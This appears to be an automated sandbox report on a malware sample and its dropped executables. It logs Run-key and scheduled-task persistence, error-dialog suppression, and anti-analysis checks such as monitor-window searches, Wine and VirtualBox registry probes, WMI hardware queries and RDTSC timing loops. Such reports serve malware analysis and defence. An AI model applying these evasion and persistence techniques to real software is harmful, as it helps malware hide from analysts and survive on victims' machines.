Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe

Source: C:\Users\user\Desktop\file.exe

0_2_004195E0

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-81829

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: ABEC99 second address: ABEC9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4A265 second address: C4A280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C496BA second address: C496CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F0E948C9FB6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d jl 00007F0E948C9FB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C49817 second address: C4984A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F0E94F51A5Ch 0x0000000f jmp 00007F0E94F51A56h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4984A second address: C4986D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jo 00007F0E948C9FB6h 0x00000015 pop ecx 0x00000016 rdtsc
